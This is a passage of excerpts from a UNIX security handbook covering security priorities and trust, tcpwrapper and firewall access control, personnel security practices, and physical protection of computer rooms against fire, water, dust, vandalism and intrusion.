upgrade or a bug fix, a disaster could occur. Imagine if your ls command occasionally deleted files<br />

instead of listing them! This type of security can also be considered as ensuring the correctness of<br />

the data and software you use.<br />

Control<br />

Regulating access to your system. If unknown and unauthorized individuals (or software) are<br />

found on your system, they can create a big problem. You must worry about how they got in, what<br />

they might have done, and who or what else has also accessed your system. Recovering from such<br />

episodes can require considerable time and expense for rebuilding and reinstalling your system,<br />

and verifying that nothing important has been changed or disclosed - even if nothing actually<br />

happened.<br />

Audit<br />

As well as worrying about unauthorized users, authorized users sometimes make mistakes, or even<br />

commit malicious acts. In such cases, you need to determine what was done, by whom, and what<br />

was affected. The only way to achieve these results is by having some incorruptible record of<br />

activity on your system that positively identifies the actors and actions involved. In some critical<br />

applications, the audit trail may be extensive enough to allow "undo" operations to help restore the<br />

system to a correct state.<br />

Although all of these aspects of security are important, different organizations will view each with

a different amount of importance. This variance is because different organizations have different security<br />

concerns, and must set their priorities and policies accordingly. For example:<br />

● In a banking environment, integrity and auditability are usually the most critical concerns, while confidentiality and availability are the next in importance.

● In a national defense-related system that processes classified information, confidentiality may come first, and availability last.[1]

[1] In some highly classified environments, officials would prefer to blow up a building rather than allow an attacker to gain access to the information contained within that building's walls.

● In a university, integrity and availability may be the most important requirements. The priority is that students be able to work on their papers, rather than tracking the precise times that students accessed their accounts.

If you are a security administrator, you need to thoroughly understand the needs of your operational<br />

environment and users. You then need to define your procedures accordingly. Not everything we<br />

describe in this book will be appropriate in every environment.<br />

2.1.1 Trust<br />

<strong>Sec</strong>urity professionals generally don't refer to a computer system as being "secure" or "unsecure."[2]<br />

Instead, we use the word "trust" to describe our level of confidence that a computer system will behave<br />

as expected. This acknowledges that absolute security can never be present. We can only try to approach<br />


it by developing enough trust in the overall configuration to warrant using it for critical applications.<br />

[2] We use the term unsecure to mean having weak security, and insecure to describe the<br />

state of mind of people running unsecure systems.<br />

Developing adequate trust in your computer systems requires careful thought and planning. Decisions<br />

should be based on sound policy and risk analysis. In the remainder of this chapter, we'll

discuss the general procedure for creating workable security plans and policies. The topic is too big,<br />

however, for us to provide an in-depth treatment:<br />

● If you are at a company, university, or government agency, we suggest that you contact your internal audit and/or risk management department for additional help (they may already have some plans and policies in place that you should know about). You can also learn more about this topic by consulting some of the works referenced in Appendix D, Paper Sources. You may also wish to enlist a consulting firm. For example, many large accounting and audit firms now have teams of professionals that can evaluate the security of computer installations.

● If you are with a smaller institution or are dealing with a personal machine, you may decide that we cover these issues in greater detail than you actually need. Nevertheless, the information contained in this chapter will help guide you in setting your priorities.




Chapter 17<br />

TCP/IP Services<br />

17.2 Controlling Access to Servers<br />

As it is delivered by most vendors, <strong>UNIX</strong> is intended to be a friendly and trusting operating system; by<br />

default, network services are offered to every other computer on the network. Unfortunately, this practice<br />

is not an advisable policy in today's networked world. While you may want to configure your network<br />

server to offer a wide variety of network services to computers on your organization's internal network,<br />

you probably want to restrict the services that your computer offers to the outside world.<br />

A few <strong>UNIX</strong> servers have built-in facilities for limiting access based on the IP address or hostname of<br />

the computer making the service request.[5] For example, NFS allows you to specify which hosts can<br />

mount a particular filesystem, and nntp allows you to specify which hosts can read netnews.<br />

Unfortunately, these services are in the minority: most <strong>UNIX</strong> servers have no facility for host-by-host<br />

access control.<br />

[5] Restricting a service by IP address or hostname is a fundamentally unsecure way to<br />

control access to a server. Unfortunately, because more sophisticated authentication services<br />

such as Kerberos and DCE are not in widespread use, address-based authentication is the<br />

only choice available at most sites.<br />

There are several techniques that you can use for controlling access to servers that do not provide their<br />

own systems for access control. These include:<br />

● The tcpwrapper program written by Wietse Venema. tcpwrapper is a simple utility program that can be "wrapped" around existing Internet servers. The program allows you to restrict servers according to connecting host, and a number of other parameters. This program also allows incoming connections to be logged via syslog. It is described in Chapter 22, Wrappers and Proxies.

● You can place a firewall between your server and the outside network. A firewall can protect an entire network, whereas tcpwrapper can only protect services on a specific machine. Unfortunately, most firewalls do not allow the fine-grained control that tcpwrapper permits, and do not permit the logging of accepted or rejected connections. Firewalls are described in Chapter 21, Firewalls.

We see tcpwrapper and firewalls as complementary technologies, rather than competing ones. For<br />

example, you can run tcpwrapper on each of your computers, and then protect your entire network

with a firewall. This combination is an example of defense in depth, the philosophy of not depending on<br />

one particular technology for all your protection.<br />
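As a small example of the wrapper side of such a combination, the following commands set up a deny-by-default policy for wrapped services. This is a sketch only: the control files /etc/hosts.allow and /etc/hosts.deny, the daemon names, and the 192.168.1 internal network shown are assumptions that depend on how tcpwrapper was built and on your own addressing.

    # Sketch: deny wrapped services by default, then allow the internal network.
    # File locations, daemon names, and addresses are examples only.

    # Deny any wrapped service not explicitly allowed.
    echo 'ALL: ALL' >> /etc/hosts.deny

    # Allow telnet and ftp from the internal network, and let the host talk to itself.
    echo 'in.telnetd, in.ftpd: 192.168.1.' >> /etc/hosts.allow
    echo 'ALL: LOCAL, 127.0.0.1'           >> /etc/hosts.allow

Remember that these rules still authenticate by address and hostname, with the limitations noted in the footnote earlier in this section; they are a complement to the firewall, not a substitute for it.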



Chapter 13

Personnel Security

13.2 On the Job

Your security concerns with an employee should not stop after that person is hired.<br />

13.2.1 Initial Training<br />

Every potential computer user should undergo fundamental education in security policy as a matter of<br />

course. At the least, this education should include procedures for password selection and use, physical<br />

access to computers, backup procedures, dial-in policies, and the policies for divulging information over<br />

the telephone. Executives should not be excluded from these classes because of their status - they are as<br />

likely (or more likely) as other personnel to pick poor passwords and commit other errors. They, too,<br />

must demonstrate their commitment to security: security consciousness flows from the top down, not the<br />

other way.<br />

Education should include written materials and a copy of the computer-use policy. The education should<br />

include discussion of appropriate and inappropriate use of the computers and networks, personal use of<br />

computing equipment (during and after hours), policy on ownership and use of electronic mail, and<br />

policies on the import and export of software and papers. Penalties for violations of these policies should<br />

also be detailed.<br />

All users should sign a form acknowledging the receipt of this information, and their acceptance of its<br />

restrictions. These forms should be retained. Later, if any question arises as to whether the employee was<br />

given prior warning about what was allowed, there will be proof.<br />

13.2.2 Ongoing Training and Awareness<br />

Periodically, users should be presented with refresher information about security and appropriate use of<br />

the computers. This retraining is an opportunity to explain good practice, remind users of current threats<br />

and their consequences, and provide a forum to air questions and concerns.<br />

Your staff should also be given adequate opportunities for ongoing training. This training should include<br />

support to attend professional conferences and seminars, to subscribe to professional and trade<br />

periodicals, and to obtain reference books and other training materials. Your staff must also be given<br />

sufficient time to make use of the material, and positive incentives to master it.<br />

Coupled with periodic education, you may wish to employ various methods of continuing awareness.<br />

These methods could include putting up posters or notices about good practice,[1] having periodic<br />


messages of the day with tips and reminders, having an "Awareness Day" every few months, or having<br />

other events to keep security from fading into the background.<br />

[1] If you do this, change them periodically. A poster or notice that has not changed in many<br />

months becomes invisible.<br />

Of course, the nature of your organization, the level of threat and possible loss, and the size and nature of<br />

your user population should all be factored into your plans. The cost of awareness activities should also<br />

be considered and budgeted in advance.<br />

13.2.3 Performance Reviews and Monitoring<br />

The performance of your staff should be reviewed periodically. In particular, the staff should be given<br />

credit and rewarded for professional growth and good practice. At the same time, problems should be<br />

identified and addressed in a constructive manner. You must encourage staff members to increase their<br />

abilities and enhance their understanding.<br />

You also want to avoid creating situations in which staff members feel overworked, underappreciated, or<br />

ignored. Creating such a working environment can lead to carelessness and a lack of interest in<br />

protecting the interests of the organization. The staff could also leave for better opportunities. Or worse,<br />

the staff could become involved in acts of disruption as a matter of revenge. Overtime must be an<br />

exception and not the rule, and all employees - especially those in critical positions - must be given

adequate holiday and vacation time.<br />

In general, users with privileges should be monitored for signs of excessive stress, personal problems, or<br />

other indications of difficulties. Identifying such problems and providing help, where possible, is at the<br />

very least humane. Such practice is also a way to preserve valuable resources - the users themselves, and<br />

the resources to which they have access. A user under considerable financial or personal stress might<br />

spontaneously take some action that he would never consider under more normal situations...and that<br />

action might be damaging to your operations.<br />

13.2.4 Auditing Access<br />

Ensure that auditing of access to equipment and data is enabled, and is monitored. Furthermore, ensure<br />

that anyone with such access knows that auditing is enabled. Many instances of computer abuse are<br />

spontaneous in nature. If a possible malefactor knows that the activity and access are logged, he might be<br />

discouraged in his actions.<br />

13.2.5 Least Privilege and Separation of Duties<br />

Consider carefully the time-tested principles of least privilege and separation of duties. These should be<br />

employed wherever practical in your operations.<br />

Least privilege<br />

This principle states that you give each person the minimum access necessary to do his or her job.<br />

This restricted access is both logical (access to accounts, networks, programs) and physical (access<br />

to computers, backup tapes, and other peripherals). If every user has accounts on every system and<br />


has physical access to everything, then all users are roughly equivalent in level of threat.<br />

Separation of duties<br />

This principle states that you should carefully separate duties so that people involved in checking<br />

for inappropriate use are not also capable of making such inappropriate use. Thus, having all the<br />

security functions and audit responsibilities reside in the same person is dangerous. This practice<br />

can lead to a case in which the person may violate security policy and commit prohibited acts, yet<br />

in which no other person sees the audit trail to be alerted to the problem.<br />

Beware Key Employees<br />

No one in an organization should be irreplaceable, because no human is immortal. If your organization<br />

depends on the ongoing performance of a key employee, then your organization is at risk.<br />

Organizations cannot help but have key employees. To be secure, organizations should have written<br />

policies and plans established for unexpected illness or departure.<br />

In one case that we are familiar with, a small company with 100 employees had spent more than 10 years<br />

developing its own custom-written accounting and order entry system. The system was written in a<br />

programming language that was not widely known, originally provided by a company that had possibly

gone out of business. Two people understood the organization's system: the MIS director and her<br />

programmer. These two people were responsible for making changes to the account system's programs,<br />

preparing annual reports, repairing computer equipment when it broke, and even performing backups<br />

(which were stored, off-site, at the MIS director's home office).<br />

What would happen if the MIS director and her programmer were killed one day in a car accident on<br />

their way to meet with a vendor? What would happen if the MIS director were offered a better job, at<br />

twice the salary?<br />

That key personnel are irreplaceable is one of the real costs associated with computer systems - one that<br />

is rarely appreciated by an organization's senior management. The drawbacks of this case illustrate one<br />

more compelling reason to use off-the-shelf software, and to have established written policies and<br />

procedures, so that a newly hired replacement can easily fill another's shoes.<br />

13.2.6 Departure<br />

Personnel leave, sometimes on their own, and sometimes involuntarily. In either case, you should have a defined set of actions for handling the departure. This procedure should include shutting down accounts; forwarding email; changing critical passwords, phone numbers, and combinations; and otherwise removing access to your systems.

In some environments, this suggestion may be too drastic. In the case of a university, for instance, graduated students might be allowed to keep accounts active for months or years after they leave. In such cases, you must determine exactly what access is to be allowed and what access is to be disallowed. Make certain that the personnel involved know exactly what the limits are.

In other environments, a departure is quite sudden and dramatic. Someone may show up at work, only to find the locks changed and a security guard waiting with a box containing everything that was in the user's desk drawers. The account has already been deleted, all system passwords have been changed, and the user's office phone number is no longer assigned. This form of separation management is quite common in the financial services industry, and is understood to be part of the job.




Chapter 12
Physical Security

12.2 Protecting Computer Hardware

Physically protecting a computer presents many of the same problems that arise when protecting typewriters, jewelry, and file cabinets. Like a typewriter, an office computer is something that many people inside the office need to access on an ongoing basis. Like jewelry, computers are very valuable, and very easy for a thief to sell. But the real danger in having a computer stolen isn't the loss of the system's hardware: it's the loss of the data that was stored on the computer's disks. As with legal files and financial records, if you don't have a backup - or if the backup is stolen with the computer - the data you have lost may well be irreplaceable. Even if you do have a backup, you will still need to spend valuable time setting up a replacement system. Finally, there is always the chance that the stolen information itself, or even the mere fact that information was stolen, will be used against you.

Your computers are among the most expensive possessions in your home or office; they are also the pieces of equipment that you can least afford to lose.[1]

[1] We know of some computer professionals who say, "I don't care if the thief steals my computer; I just wish that he would first take out the hard drive!" Unfortunately, you can rarely reason in this manner with would-be thieves.

To make matters worse, computers and computer media are by far the most temperamental objects in today's home or office. Few people worry that their television sets will be damaged if they're turned on during a lightning storm, but a computer's power supply can be blown out simply by leaving the machine plugged into the wall if lightning strikes nearby. Even if the power surge doesn't destroy the information on your hard disk, it still may make the information inaccessible until the computer system is repaired.

Power surges don't come only during storms: one of the authors once had a workstation ruined because a vacuum cleaner was plugged into the same outlet as the running workstation. When the vacuum was switched on, the power surge fatally shorted out the workstation's power supply. Because of the age of the computer involved, it proved to be cheaper to throw out the machine and lose the data than to attempt to salvage the hardware and the information stored on the machine's disk. That was an expensive form of spring cleaning!

There are several measures that you can take to protect your computer system against physical threats. Many of them will simultaneously protect the system from dangers posed by nature, outsiders, and inside saboteurs.


12.2.1 The Environment

Computers are extremely complicated devices that often require exactly the right balance of physical and environmental conditions to operate properly. Altering this balance can cause your computer to fail in unexpected and often undesirable ways. Even worse, your computer might continue to operate, but erratically, producing incorrect results and corrupting valuable data.

In this respect, computers are a lot like people: they don't work well if they're too hot, too cold, or submerged in water without special protection.

12.2.1.1 Fire

Computers are notoriously bad at surviving fires. If the flames don't cause your system's case and circuit boards to ignite, the heat might melt your hard drive and all the solder holding the electronic components in place. Your computer might even survive the fire, only to be destroyed by the water used to fight the flames.

You can increase the chances that your computer will survive a fire by making sure that there is good fire-extinguishing equipment nearby.

In the late 1980s, Halon fire extinguishers were exceedingly popular for large corporate computer rooms. Halon is a chemical that works by "asphyxiating" the fire's chemical reaction. Unlike water, Halon does not conduct electricity and leaves no residue, so it will not damage expensive computer systems. Unfortunately, Halon may also asphyxiate humans in the area. For this reason, all automatic Halon systems have loud alarms that sound before the Halon is discharged. Halon has another problem as well: after it is released into the environment, it slowly diffuses into the stratosphere, where it acts as a potent greenhouse gas and contributes to the destruction of the ozone layer. Halon is therefore being phased out and replaced with systems based on carbon dioxide (CO2), which still asphyxiate fires (and possibly humans), but which do not cause as much environmental degradation.

Here are some guidelines for fire control:

● Make sure that you have a hand-held fire extinguisher by the doorway of your computer room.
● Train your computer operators in the proper use of the fire extinguisher. Repeat the training at least once a year. One good way to do this is to have your employees practice with extinguishers that need to be recharged (usually once every year or two). However, don't practice indoors!
● Check the recharge state of each extinguisher every month. Extinguishers with gauges will show if they need recharging. All extinguishers should be recharged and examined by a professional on a periodic basis (sometimes those gauges stick in the "full" position!).
● If you have a Halon or CO2 system, make sure everyone who enters the computer room knows what to do when the alarm sounds. Post warning signs in appropriate places.
● If you have an automatic fire-alarm system, make sure you can override it in the event of a false alarm.
● Ensure that there is telephone access for your operators and users who may discover a fire or a false alarm.

Many modern computers will not be damaged by automatic sprinkler systems, provided that the computer's power is turned off before the water starts to flow (although disks, tapes, and printouts out in the open may suffer). Consequently, you should have your computer's power automatically cut if the water sprinkler triggers.[2] Be sure that the computer has completely dried out before the power is restored. If your water has a very high mineral content, you may find it necessary to have the computer's circuit boards professionally cleaned before attempting to power up. Remember, getting sensitive electronics wet is never a good idea.

[2] If you have an uninterruptible power supply, be sure that it is automatically disconnected, too.

Because many computers can now survive exposure to water, many fire-protection experts now suggest that a water sprinkler system may be as good as (or better than) a CO2 system. In particular, a water system will continue to run long after a CO2 system is exhausted, so it is more likely to work against major fires. Water systems are also less expensive to maintain, and less hazardous to humans.

If you choose to have a water-based sprinkler system installed, be sure it is a "dry-pipe" system. This keeps water out of the pipes until an alarm is actually triggered, rather than having the sprinkler heads pressurized all the time. This may save your system from leaks or misfortune.[3]

[3] We know of one instance where a maintenance man accidentally knocked a sprinkler head off with a stepladder. The water came out in such quantity that the panels of the raised floor were floating before the water was shut off. The mess took more than a week to clean up.

Be sure that your wiring, in addition to your computers, is protected. Be certain that smoke detectors and sprinkler heads are appropriately positioned to cover wires in wiring trays (often above your suspended ceilings) and in wiring closets.

12.2.1.2 Smoke

Smoke is very good at damaging computer equipment. Smoke is a potent abrasive and collects on the heads of magnetic disks, optical disks, and tape drives. A single smoke particle can cause a severe disk crash on some kinds of older disk drives without a sealed drive compartment.

Sometimes smoke is generated by computers themselves. Electrical fires - particularly those caused by the transformers in video monitors - can produce a pungent, acrid smoke that can damage other equipment and may also be a potent carcinogen. Several years ago, a laboratory at Stanford had to be evacuated because of toxic smoke caused by a fire in a single video monitor.

An even greater danger is the smoke that comes from cigarettes and pipes. Such smoke is a health hazard to people and computers alike. Smoke will cause premature failure of keyboards and require that they be cleaned more often. Nonsmokers in a smoky environment will not perform as well as they might otherwise, both in the near term and the long term; and in many locales, smoking in public or semi-public places is illegal.

Here are some guidelines for smoke control:

● Do not permit smoking in your computer room or around the people who use the computers.
● Install smoke detectors in every room with computer or terminal equipment.
● If you have a raised floor, mount smoke detectors underneath the floor as well.
● If you have suspended ceilings, mount smoke detectors above the ceiling tiles.

Get a Carbon-Monoxide Detector!

Carbon monoxide (CO) won't harm your computer, but it might silently kill any humans in the vicinity. One of the authors of this book was nearly killed in February 1994 when his home chimney became plugged and the furnace exhaust started venting into his house. Low-cost carbon monoxide detectors are readily available. They should be installed wherever coal, oil, or gas-fired appliances are used.

If you think this doesn't apply to your computer environment, think again. Closed office buildings can build up strong concentrations of CO from faulty heater venting, problems with generator exhaust (as from a UPS), or even a truck idling outside with its exhaust near the building's air intake.

12.2.1.3 Dust

Dust destroys data. As with smoke, dust can collect on the heads of magnetic disks, tape drives, and optical drives. Dust is abrasive and will slowly destroy both the recording head and the media.

Most dust is electrically conductive. The design of many computers sucks large amounts of air and dust through the computer's insides for cooling. Invariably, a layer of dust will accumulate on a computer's circuit boards, covering every surface, exposed and otherwise. Eventually, the dust will cause circuits to short and fail.

Here are some guidelines for dust control:

● Keep your computer room as dust free as possible.
● If your computer has air filters, clean or replace them on a regular basis.
● Get a special vacuum for your computers and use it on a regular basis. Be sure to vacuum behind your computers. You may also wish to vacuum your keyboards.
● In environments with dust that you can't control well, consider getting keyboard dust covers to use when the keyboards are idle for long periods of time. However, don't simply throw homemade covers over your computers - doing so can cause the computer to overheat, and some covers can build up significant static charges.

12.2.1.4 Earthquake

While some parts of the world are subject to frequent and severe earthquakes, nearly every part of the world experiences the occasional temblor. In the United States, for example, the San Francisco Bay Area experiences several earthquakes every year; a major earthquake is expected within the next 20 years that may be equal in force to the great San Francisco earthquake of 1906. Scientists also predict an 80% chance that the eastern half of the United States may experience a similar earthquake within the next 30 years: the only truly unknown factor is where it will occur. As a result, several Eastern cities have enacted stringent anti-earthquake building codes. These days, many new buildings in Boston are built with diagonal cross-braces, using construction that one might expect to see in San Francisco.

While some buildings collapse in an earthquake, most remain standing. Careful attention to the placement of shelves and bookcases in your office can increase the chances that your computers will survive all but the worst disasters.

Here are some guidelines for earthquake control:

● Avoid placing computers on any high surfaces - for example, on top of file cabinets.
● Do not place heavy objects on bookcases or shelves near computers in such a way that they might fall on the computer during an earthquake.
● To protect your computers from falling debris, place them underneath strong tables.
● Do not place computers on desks next to windows - especially on higher floors. In an earthquake, the computer could be thrown through the window, destroying the computer and creating a hazard for people on the ground below.
● Consider physically attaching the computer to the surface on which it is resting. You can use bolts, tie-downs, straps, or other implements. (This practice also helps deter theft of the equipment.)

12.2.1.5 Explosion

Although computers are not prone to explosion, the buildings in which they are located can be - especially if a building is equipped with natural gas or is used to store flammable solvents.

If you need to operate a computer in an area where there is a risk of explosion, you might consider purchasing a system with a ruggedized case. Disk drives can be shock-mounted within a computer; if explosion is a constant hazard, consider using a ruggedized laptop with an easily removed, shock-resistant hard drive.

Here are some basic guidelines for explosion control:

● Consider the real possibility of explosion on your premises. Make sure that solvents, if present, are stored in appropriate containers in clean, uncluttered areas.
● Keep your backups in blast-proof vaults or off-site.
● Keep computers away from windows.

12.2.1.6 Temperature extremes

As with people, computers operate best within certain temperature ranges. Most computer systems should be kept between 50 and 90 degrees Fahrenheit (10 to 32 degrees Celsius). If the ambient temperature around your computer gets too high, the computer cannot adequately cool itself, and internal components can be damaged. If the temperature gets too cold, the system can undergo thermal shock when it is turned on, causing circuit boards or integrated circuits to crack.


Here are some basic guidelines for temperature control:

● Check your computer's documentation to see what temperature ranges it can tolerate.
● Install a temperature alarm in your computer room that is triggered by a temperature that is too low or too high. Set it to go off when the temperature gets within 15-20 degrees (F) of the limits your system can take. Some alarms can even be connected to a phone line and programmed to dial predefined phone numbers and tell you, with a synthesized voice, "Your computer room is too hot."
● Be careful about placing computers too close to walls, which can interfere with air circulation. Most manufacturers recommend that their systems have 6 to 12 inches of open space on every side. If you cannot afford the necessary space, lower the computer's upper-limit temperature by 10 degrees Fahrenheit or more.

12.2.1.7 Bugs (biological)

Sometimes insects and other kinds of bugs find their way into computers. Indeed, the very term bug, used to describe something wrong with a computer program, dates back to 1947, when Grace Murray Hopper's team found a moth trapped between the relay contacts of Harvard University's Mark II computer.

Insects have a strange predilection for getting trapped between the high-voltage contacts of switching power supplies. Others seem to have insatiable cravings for the insulation that covers wires carrying line current, or are drawn to the high-pitched whine that switching power supplies emit. Spider webs inside computers collect dust like a magnet.

12.2.1.8 Electrical noise

Motors, fans, heavy equipment, and even other computers can generate electrical noise that can cause intermittent problems with the computer you are using. This noise can be transmitted through space or through nearby power lines.

Electrical surges are a special kind of electrical noise that consists of one (or a few) high-voltage spikes. As we've mentioned, an ordinary vacuum cleaner plugged into the same electrical outlet as a workstation can generate a spike capable of destroying the workstation's power supply.

Here are some guidelines for electrical noise control:

● Make sure that there is no heavy equipment on the electrical circuit that powers your computer system.
● If possible, have a special electrical circuit with an isolated ground installed for each computer system.
● Install a line filter on your computer's power supply.
● If you have problems with static, you may wish to install a static (grounding) mat around the computer's area, or apply antistatic sprays to your carpet.
● Walkie-talkies, cellular telephones, and other kinds of radio transmitters can cause computers to malfunction when they are transmitting. Especially powerful transmitters can even cause permanent damage to systems. Transmitters have also been known to trigger the explosive charges in some sealed fire-extinguisher systems (e.g., Halon). All radio transmitters should be kept at least five feet from the computer, cables, and peripherals. If many people in your organization use portable transmitters, you should consider posting signs instructing them not to transmit in the computer's vicinity.

12.2.1.9 Lightning

Lightning generates large power surges that can damage even computers whose electrical supplies are otherwise protected. If lightning strikes your building's metal frame (or hits your building's lightning rod), the resulting current on its way to ground can generate an intense magnetic field.

Here are some guidelines for lightning control:

● If possible, turn off and unplug computer systems during lightning storms.
● Make sure that your backup tapes, if they are kept on magnetic media, are stored as far as possible from the building's structural steel members.
● Surge-suppressor outlet strips will not protect your system from a direct strike, but they may help if the storm is distant. Some surge suppressors include additional protection for sensitive telephone equipment; this extra protection may be of questionable value in most areas, though, since by law telephone circuits must be equipped with lightning arresters.
● In remote areas, modems are still damaged by lightning, even though they are on lines equipped with lightning arresters. In these areas, modems may benefit from additional lightning protection.

12.2.1.10 Vibration

Vibration can put an early end to your computer system by literally shaking it apart. Even gentle vibration, over time, can work printed circuit boards out of their edge connectors and integrated circuits out of their sockets. Vibration can cause hard disk drives to come out of alignment and increase the chance of catastrophic failure - and resulting data loss.

Here are some guidelines for vibration control:

● Isolate your computer from vibration as much as possible.
● If you are in a high-vibration environment, you can place your computer on a rubber or foam mat to dampen the vibrations reaching it, but make sure that the mat does not block ventilation openings.
● Laptop computers are frequently equipped with hard disks that are better at resisting vibration than those in desktop machines.
● Don't put your printer on top of a computer. Printers are mechanical devices; they generate vibrations. Desktop space may be a problem, but a bigger problem may be the unexpected failure of your computer's disk drive or system board.

12.2.1.11 Humidity

Humidity is your computer's friend - but as with all friends, you can get too much of a good thing. Humidity prevents the buildup of static charge. If your computer room is too dry, static discharge between operators and your computer (or between the computer's moving parts) may destroy information or damage your computer itself. If the computer room is too humid, you may experience condensation on the computer's circuitry, which can short out and damage the electrical circuits.

Here are some guidelines for humidity control:

● For optimal performance, keep the relative humidity of your computer room above 20% and well below the dew point (which depends on the ambient room temperature).
● In environments that require high reliability, you may wish to have a humidity alarm that will ring when the humidity is outside your acceptable range.
● Some equipment has special humidity restrictions. Check your manuals.

12.2.1.12 Water

Water can destroy your computer. The primary danger is an electrical short, which can happen if water bridges between a circuit-board trace carrying voltage and a trace carrying ground. A short will cause too much current to be pulled through a trace, and will heat up the trace and possibly melt it. Shorts can also destroy electronic components by pulling too much current through them.

Water usually comes from rain or flooding. Sometimes it comes from an errant sprinkler system. Water may also come from strange places, such as a toilet overflowing on a higher floor, vandalism, or the fire department.

Here are some guidelines for water control:

● Mount a water sensor on the floor near the computer system.
● If you have a raised floor in your computer room, mount water detectors both underneath the floor and above it.
● Do not keep your computer in the basement of your building if your area is prone to flooding, or if your building has a sprinkler system.
● Because water rises, you may wish to have two alarms, located at different heights. The first water sensor should ring an alarm; the second should automatically cut off power to your computer equipment. Automatic power cutoffs can save a lot of money if the flood happens off-hours, or if the flood occurs when the person who is supposed to attend to the alarm is otherwise occupied. More importantly, cutoffs can save lives: electricity, water, and people shouldn't mix.

12.2.1.13 Environmental monitoring

To detect spurious problems, you should continuously monitor and record your computer room's temperature and relative humidity. As a general rule of thumb, every 1,000 square feet of office space should have its own recording equipment. Log and check the recordings on a regular basis.


12.2.2 Preventing Accidents

In addition to environmental problems, your computer system is vulnerable to a multitude of accidents. While it is impossible to prevent all accidents, careful planning can minimize the impact of those that will inevitably occur.

12.2.2.1 Food and drink

People need food and drink to stay alive. Computers, on the other hand, need to stay away from food and drink. One of the fastest ways of putting a keyboard out of commission is to pour a soft drink or cup of coffee between the keys. If this keyboard is your system console, you may be unable to reboot the computer until the console is replaced (we know this from experience).

Food - especially oily food - collects on people's fingers, and from there gets onto anything that a person touches. Often this includes dirt-sensitive surfaces such as magnetic tapes and optical disks. Sometimes food can be cleaned away; other times it cannot. Oils from foods also tend to get onto screens, increasing glare and decreasing readability. Some screens (especially some terminals from Digital Equipment Corporation) are equipped with special quarter-wavelength antiglare coatings: when touched with oily hands, the fingerprints will glow with an annoying iridescence. Generally, the simplest rule is the safest: keep all food and drink away from your computer systems.[4]

[4] Perhaps more than any other rule in this chapter, this rule is honored most often in the breach.

12.2.3 Physical Access

Simple common sense will tell you to keep your computer in a locked room. But how safe is that room? Sometimes a room that appears to be quite safe is actually wide open.

12.2.3.1 Raised floors and dropped ceilings

In many modern office buildings, internal walls do not extend above dropped ceilings or beneath raised floors. This type of construction makes it easy for people in adjoining rooms, and sometimes adjoining offices, to gain access.

Here are some guidelines for dealing with raised floors and dropped ceilings:

● Make sure that your building's internal walls extend above your dropped ceilings, so that intruders cannot enter locked offices simply by climbing over the walls.
● Likewise, if you have raised floors, make sure that the building's walls extend down to the real floor.

12.2.3.2 Entrance through air ducts

If the air ducts that serve your computer room are large enough, intruders can use them to gain entrance to an otherwise secured area.

Here are some guidelines for dealing with air ducts:

● Areas that need large amounts of ventilation should be served by several small ducts, none of which is large enough for a person to traverse.
● As an alternative, screens can be welded over air vents, or even within air ducts, to prevent unauthorized entry (although screens can be cut).
● The truly paranoid administrator may wish to place motion detectors inside air ducts.

12.2.3.3 Glass walls

Although glass walls and large windows frequently add architectural panache, they can be severe security risks. Glass walls are easy to break; a brick and a bottle of gasoline thrown through a window can do an incredible amount of damage. Glass walls are also easy to look through: an attacker can gain critical knowledge, such as passwords or information about system operations, simply by carefully watching people on the other side of a glass wall or window.

Here are some guidelines for dealing with glass walls:

● Avoid glass walls and windows for security-sensitive areas.
● If you must have some amount of translucence, consider walls made of glass blocks.

12.2.4 Vandalism

Computer systems are good targets for vandalism. Reasons for vandalism include:

● Intentional disruption of services (e.g., a student who has homework due)
● Revenge (e.g., a fired employee)
● Riots
● Strike-related violence
● Entertainment for the feebleminded

Computer vandalism is often fast, easy, and very expensive. Sometimes, vandalism is actually sabotage presented as random vandalism.

In principle, any part of a computer system - or the building that houses it - may be a target for vandalism. In practice, some targets are more vulnerable than others. Some are described briefly in the following sections.

12.2.4.1 Ventilation holes

Several years ago, 60 workstations at the Massachusetts Institute of Technology were destroyed in a single evening by a student who poured Coca-Cola into each computer's ventilation holes. Authorities surmised that the vandal was a student who had not completed a problem set due the next day.

Computers that have ventilation holes need them. Don't seal up the holes to prevent this sort of vandalism. However, a rigidly enforced policy against food and drink in the computer room - or a 24-hour guard - can help prevent this kind of incident from happening at your site.

12.2.4.2 Network cables

Local and wide area networks are exceedingly vulnerable to vandalism. In many cases, a vandal can disable an entire subnet of workstations by cutting a single wire with a pair of wire cutters. Compared with Ethernet, fiber optic cables are at the same time more vulnerable (because they can sometimes be more easily damaged), more difficult to repair (because fiber optics are difficult to splice), and more attractive targets (because they often carry more information).

One simple method for protecting a network cable is to run it through physically secure locations. For example, Ethernet cable is often placed in cable trays or suspended from ceilings with plastic loops. But Ethernet can also be run through steel conduit between offices. Besides protecting against vandalism, this practice protects against some forms of network eavesdropping, and may help protect your cables in the event of a small fire.

Some high-security installations use double-walled, shielded conduit with a pressurized gas between the layers. Pressure sensors on the conduit cut off all traffic or sound a warning bell if the pressure ever drops, as might occur if someone breached the walls of the pipe. It is important that you physically protect your network cables. Placing the wire inside an electrical conduit when it is first installed can literally save thousands of dollars in repairs and hundreds of hours in downtime later.

Many universities have networks that rely on Ethernet or fiber optic cables strung through the basements. A single frustrated student with a pair of wirecutters or a straight pin can halt the work of thousands of students and professors.

We have also heard stories about fiber optic cable suffering small fractures because someone stepped on it. A fracture of this type is difficult to locate because there is no break in the coating. Be very careful where you place your cables. Note that "temporary" cable runs often turn into permanent or semi-permanent installations, so take the extra time and effort to install cable correctly the first time.

12.2.4.3 Network connectors

In addition to cutting a cable, a vandal who has access to a network's endpoint - a network connector - can electronically disable or damage the network. Ethernet is especially vulnerable to grounding and network-termination problems. Simply by removing a terminator at the end of the network cable or by grounding an Ethernet's inside conductor, an attacker can render the entire network inoperable. Usually this event happens by accident; however, it can also happen as the result of an intentionally destructive attack.

All networks based on wire are vulnerable to attacks with high voltage. At one university in the late 1980s, a student destroyed a cluster of workstations by plugging the thin-wire Ethernet cable into a 110VAC wall outlet. (Once again, the student wanted to simulate a lightning strike because he hadn't done his homework.)


12.2.5 Defending Against Acts of War and Terrorism

Unless your computer is used by the military or is being operated in a war zone, it is unlikely to be a war target. Nevertheless, if you live in a region that is subject to political strife, you may wish to consider additional structural protection for your computer room.

Alternatively, you may find it cheaper to devise a system of hot backups and mirrored disks and servers. With a reasonably fast network link, you can arrange for files stored on one computer to be simultaneously copied to another system on the other side of town - or the other side of the world. Sites that cannot afford simultaneous backup can have hourly or nightly incremental dumps made across the network link. Although a tank or suicide bomber may destroy your computer center, your data can be safely protected someplace else.

12.2.6 Preventing Theft

